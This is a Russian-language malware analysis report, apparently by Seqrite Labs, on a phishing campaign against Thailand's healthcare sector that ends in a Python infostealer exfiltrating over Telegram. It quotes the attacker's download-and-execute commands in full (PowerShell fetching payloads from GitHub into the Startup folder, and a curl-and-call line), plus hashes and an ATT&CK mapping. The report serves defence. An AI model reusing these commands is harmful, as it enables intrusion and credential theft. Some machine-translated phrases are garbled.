Авторы: Вайбхав Крушна Билладе, Диксит Панчал и Румана Сиддики.
Содержание
- Введение
- Ключевые цели
- Цепочка заражения
- Предварительные результаты кампании
- Технический анализ
- Этап 1: Первоначальная доставка (архив RAR)
- Этап 2: Загрузчик пакетных файлов с обфускацией Rouki
- Этап 3: Скрипт обеспечения постоянного доступа при запуске
- Этап 4: Выполнение вторичной полезной нагрузки
- Этап 5: Развертывание программы для кражи информации (sim.py)
- Заключение
- Seqrite Покрытие
- Индикаторы компрометации (IOC)
- MITRE ATT&CK Картографирование
Введение
Seqrite Лаборатория активно отслеживает и анализирует субъектов угроз и их кампании, уделяя особое внимание установлению авторства, анализу инфраструктуры и методам противодействия. В ходе наших исследований мы установили причастность многочисленных операций к действиям групп угроз, связанных с Китаем, и других групп, нацеленных как на региональные, так и на международные структуры.
В ходе недавнего расследования мы выявили активную кампанию вредоносного ПО, нацеленную на сектор здравоохранения Таиланда, включая персонал Министерства здравоохранения и связанные с ним медицинские организации. Кампания использует фишинговые приманки на медицинскую тематику, распространяемые через вредоносные RAR-архивы, содержащие обфусцированные пакетные скрипты и исполняемые полезные нагрузки. Цепочка заражения включает в себя несколько этапов обфускации, доставку полезной нагрузки через GitHub, механизмы обеспечения устойчивости и вредоносное ПО для кражи информации, предназначенное для закрепления в целевых средах, избегая при этом обнаружения.

Ключевые цели
Кампания в первую очередь нацелена на персонал и подразделения всей системы здравоохранения Таиланда, включая:
- Сотрудники Министерства здравоохранения и государственные группы по закупкам медицинского оборудования используют подставных лиц, выдавая себя за владельцев официальных документов, подтверждающих разрешение на использование медицинского оборудования.
- Сотрудники администрации больницы использовали поддельные документы о госпитализации пациентов.
- Сотрудники радиологических и стоматологических клиник используют поддельные медицинские карты и файлы запросов рентгеновских снимков.
- Клинические и радиологические отделения используют поддельные документы с результатами компьютерной томографии пациентов.
- Команды по организации цепочки поставок в сфере здравоохранения и закупке медицинского оборудования работают с использованием документов, одобренных Министерством здравоохранения.
Выявленные привлекательные темы указывают на целенаправленное воздействие на функции, связанные со здравоохранением, и демонстрируют глубокое понимание операционных процессов в этом секторе.
Цепочка заражения
RAR-архив → Загрузчик BAT с обфускацией → Загрузчик полезной нагрузки с обфускацией Rouki → Скрипт обеспечения постоянного присутствия при запуске (WindowSecuryt.bat) → Вторичная пакетная полезная нагрузка (u-t2.bat) → Похититель информации на основе Python (sim.py) → Попытки утечки данных из Telegram

Предварительные результаты кампании
Самый ранний идентифицированный образец, связанный с кампанией, был загружен 7 апреля 2026 года, а самый последний наблюдаемый образец был загружен 3 июня 2026 года, что указывает на активный оперативный период продолжительностью приблизительно десять недель на момент анализа.
Ключевые наблюдения
- Все идентифицированные образцы были загружены из Таиланда, что указывает на использование внутренней инфраструктуры для подготовки образцов или на наличие проблем в местных системах распространения.
- Злоумышленник распространяет вредоносное ПО через RAR-архивы, содержащие вредоносные пакетные скрипты и исполняемые файлы, замаскированные под документы, связанные со здравоохранением и государственным управлением.
- Названия файлов-приманок адаптированы к конкретным должностным функциям, включая административный, клинический, радиологический и закупочный персонал, что указывает либо на предварительную разведку медицинских организаций, либо на широкую стратегию целевого воздействия, основанную на знаниях, специфичных для данной отрасли.
- Во всех наблюдаемых образцах используется согласованная цепочка выполнения RAR → BAT → Полезная нагрузка, что указывает на стандартизированный набор инструментов и воспроизводимую методологию доставки.
Технический анализ
Этап 1: Первоначальная доставка (архив RAR)
Первоначальный вектор заражения состоит из вредоносного RAR-архива, содержащего обфусцированный пакетный файл, который функционирует как загрузчик первого этапа. Обфускация широко используется для сокрытия функциональности и затруднения статического анализа.

Один из обнаруженных примеров, Health_Ministry_Approved_Equipment_2026.bat, создает временный файл, содержащий закодированные данные полезной нагрузки, и использует PowerShell для декодирования встроенного содержимого. Затем декодированное содержимое записывается во вторичный пакетный файл, который впоследствии выполняется.

После казни временные артефакты удаляются, чтобы уменьшить количество улик, представляющих угрозу для жизни человека, и осложнить расследования после компрометации.
Использование встроенных данных полезной нагрузки, процедур декодирования на основе PowerShell и операций очистки указывает на преднамеренные попытки скрыть вредоносную функциональность и обойти средства защиты.
Этап 2: Загрузчик пакетных файлов с обфускацией Rouki
Расшифрованный файл payload.bat, запущенный на первом этапе, был сильно обфусцирован с использованием фреймворка, идентифицированного как Rouki.

Анализ показал, что скрипт динамически восстанавливает и выполняет команды PowerShell, которые загружают, сохраняют и запускают дополнительные компоненты вредоносного ПО. Использование размещенных на GitHub полезных нагрузок, обманчивых расширений файлов и многоэтапного выполнения обеспечивает операционную гибкость, одновременно снижая вероятность обнаружения.
Команда PowerShell 1 – Развертывание для обеспечения постоянного доступа
powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');”
Эта команда загружает удаленно размещенный файл, замаскированный под изображение PNG, и сохраняет его как WindowSecuryt.bat в папке автозагрузки Windows.
Размещение в каталоге автозагрузки обеспечивает автоматическое выполнение при каждом входе пользователя в систему, тем самым гарантируя сохранение данных на постоянной основе.
Команда PowerShell 2 – Развертывание полезной нагрузки
powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”
Эта команда загружает ZIP-архив, извлекает его содержимое в общедоступную директорию и выполняет встроенную полезную нагрузку на основе Python (sim.py) с помощью встроенного интерпретатора Python.
После выполнения ZIP-архив удаляется, чтобы минимизировать количество артефактов, представляющих интерес для криминалистического анализа, и затруднить реагирование на инцидент.
Этап 3: Скрипт обеспечения постоянного доступа при запуске (WindowSecuryt.bat)
Анализ загруженного скрипта WindowSecuryt.bat показал, что он содержит значительное количество ненужных данных и логики обфускации, аналогичной той, что наблюдалась в пакетных загрузчиках на более ранних этапах разработки. Это нефункциональное содержимое предназначено для того, чтобы затруднить статический анализ и скрыть истинный ход выполнения скрипта.
После выполнения скрипт проводит проверку привилегий и настройку среды, прежде чем перейти к заключительному функциональному этапу, где он восстанавливает и выполняет следующую команду:
cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”
Эта команда использует curl для загрузки дополнительного пакетного файла (u-t2.bat) из репозитория, размещенного на GitHub, и сохраняет его во временном каталоге системы (%TEMP%). Использование пути %TEMP% обеспечивает доступ на запись без необходимости предоставления повышенных прав в большинстве сред.
После успешной загрузки скрипт немедленно запускает полезную нагрузку с помощью команды вызова, обеспечивая продолжение многоступенчатой цепочки заражения.
Сочетание сохранения активности в папке автозагрузки и удаленно загружаемых полезных нагрузок позволяет злоумышленнику обновлять вредоносный функционал, не изменяя исходный механизм сохранения активности.
Кроме того, размещение скрипта в папке автозагрузки Windows обеспечивает его постоянное выполнение при входе пользователя в систему. Это позволяет злоумышленнику многократно получать и запускать обновленные полезные нагрузки из удаленной инфраструктуры GitHub без изменения исходного механизма постоянного присутствия, что обеспечивает гибкий и долгосрочный контроль над цепочкой заражения.
Этап 4: Выполнение вторичной полезной нагрузки (u-t2.bat)

Анализ загруженного скрипта u-t2.bat показал, что он содержит мусорный код и обфусцированные участки, аналогичные более ранним компонентам пакетной обработки в цепочке заражения. Эти нефункциональные элементы появляются в начале скрипта и предназначены для того, чтобы затруднить статический анализ и скрыть фактический ход выполнения. Логика, имеющая смысл, скрыта глубже в этих обфусцированных сегментах и разрешается только во время выполнения.
Скрипт пытается перезапуститься с повышенными привилегиями, чтобы получить доступ к системе на более высоком уровне.
После успешного повышения привилегий скрипт переходит к выполнению следующего этапа полезной нагрузки, сводя к минимуму видимость для пользователя.
На заключительном этапе выполнения запускается следующая полезная нагрузка:
powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”
Эта команда запускает ранее развернутый интерпретатор Python и выполняет файл sim.py, при этом скрывая видимые окна выполнения.
Использование встроенной среды выполнения Python позволяет запускать программу независимо от существующей установки Python в целевой системе и снижает зависимость от развертывания.
Этап 5: Развертывание программы для кражи информации (sim.py)
В ходе анализа была выявлена последняя полезная нагрузка — sim.py, программа для кражи информации на основе Python, запускаемая через встроенную среду Python.

После запуска вредоносная программа завершает работу нескольких веб-браузеров, включая Google Chrome, Microsoft Edge, Brave и другие браузеры на основе Chromium, используя команды taskkill. Такое поведение обычно связано с вредоносными программами, стремящимися получить доступ к базам данных браузеров, хранилищам учетных данных, файлам cookie и артефактам сеансов, которые в противном случае могут быть заблокированы активными процессами.
Наблюдаемые возможности
- Собирает данные, связанные с браузером.
- Сборщик данных хранит учетные данные и информацию о сеансах.
- На этапах данные собирались во временных каталогах.
- Сжимает собранные данные в ZIP-архивы.
- Попытки утечки данных через инфраструктуру на основе Telegram.
Анализ журналов выполнения выявил неоднократные попытки передачи украденных данных в контролируемые злоумышленниками каналы Telegram с использованием жестко закодированных токенов бота и идентификаторов чатов через API бота Telegram.
Запросы на эксфильтрацию содержали метаданные, относящиеся к конкретным жертвам, такие как:
- Системные идентификаторы
- Информация об имени пользователя
- Счетчики собранных данных
- Архивные ссылки
Хотя зафиксированные попытки утечки данных не увенчались успехом из-за таймаутов подключения при обмене данными с api.telegram.org, сочетание сбора данных из браузера, локального развертывания, создания архива и попытки передачи подтверждает возможности вредоносной программы по краже информации.
В целом, вредоносная программа демонстрирует характеристики, обычно ассоциируемые с современными программами-похитителями на основе Python, включая кражу учетных данных, сбор сессионных cookie, локальное размещение данных, генерацию архивов и механизмы эксфильтрации на основе Telegram.
Использование доставки полезной нагрузки через GitHub, легитимных системных утилит, многоуровневой обфускации и многоэтапного выполнения способствует как оперативной гибкости, так и обходу средств защиты.
Заключение
Seqrite Лаборатория с умеренной степенью уверенности оценивает, что эта кампания представляет собой целенаправленную атаку на сектор здравоохранения Таиланда с использованием методов социальной инженерии, связанных со здравоохранением, многоступенчатых пакетных загрузчиков, инфраструктуры полезной нагрузки, размещенной на GitHub, и вредоносного ПО на основе Python для кражи информации.
В ходе кампании была продемонстрирована повторяемая методика доставки, включающая RAR-архивы, сильно обфусцированные пакетные скрипты, обеспечение постоянного присутствия в системе за счет злоупотребления папкой автозагрузки, поэтапное извлечение полезной нагрузки и попытки эксфильтрации данных через Telegram.
Хотя на основании имеющихся данных невозможно установить окончательную причастность, наблюдаемая оперативная согласованность между выборками предполагает, что деятельность осуществляется одним субъектом угроз или тесно связанной с ним группой. Дальнейший мониторинг соответствующей инфраструктуры, эволюции полезной нагрузки и жертв может дать дополнительные сведения о причастности и целях кампании.
Организациям в секторе здравоохранения следует сохранять бдительность в отношении фишинговых кампаний, связанных с документами, отслеживать несанкционированные изменения в папке автозагрузки и ограничивать выполнение ненадежных скриптов и исполняемых файлов, полученных из внешних источников.
Seqrite Покрытие:
- Script.Trojan.Downloader.50836.GC
- cld.script.trojan.1759432951
Индикаторы компрометации (IOC):
| Название файла | SHA256 |
| Оборудование, одобренное Министерством здравоохранения в 2026 году.rar | E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B |
| Оборудование, одобренное Министерством здравоохранения в 2026 году.bat | 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0 |
| payload.bat | F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87 |
| WindowSecuryt.bat | 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183 |
| u-t2.bat | 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9 |
| Рабочие столы.zip | 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80 |
| Похититель (SIM.PY) | 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865 |
MITRE ATT&CK Mapping:
| тактика | Название техники | Идентификатор техники |
| Первоначальный доступ | Фишинг: фишинговое вложение | T1566.001 |
| Типы | Интерпретатор команд и сценариев: командная оболочка Windows | T1059.003 |
| Интерпретатор команд и сценариев: PowerShell | T1059.001 | |
| Пользовательское выполнение: вредоносный файл | T1204.002 | |
| Уклонение от защиты | Замаскированные файлы или информация | T1027 |
| Маскировка (BAT, замаскированный под PNG/TXT) | T1036 | |
| Удаление индикатора на хосте: удаление файла | T1070.004 | |
| Настойчивость | Ключи запуска реестра / Папка автозагрузки | T1547.001 |
| Запланированное выполнение через папку автозагрузки | T1547 | |
| Повышение привилегий | Механизм контроля за повышением уровня злоупотреблений | T1548 |
| Дискавери | Обнаружение владельца системы/пользователя | T1033 |
| Доступ к учетным данным | Учетные данные из хранилищ паролей | T1555 |
| Учетные данные из веб-браузеров | T1555.003 | |
| | Архивировать собранные данные | T1560 |
| Данные из локальной системы | T1005 | |
| Данные из информационных хранилищ | T1213 | |
| Управление и контроль | Ingress Tool Transfer (полезные нагрузки, размещенные на GitHub) | T1105 |
| Протокол прикладного уровня: веб-протоколы (HTTPS) | T1071.001 | |
| Прокси через легитимные сервисы (GitHub) | T1102 | |
| эксфильтрации | Эксфильтрация через веб-сервис (API Telegram Bot) | T1567 |
| Эксфильтрация данных в облачное хранилище/веб-сервис | T1567.002 |




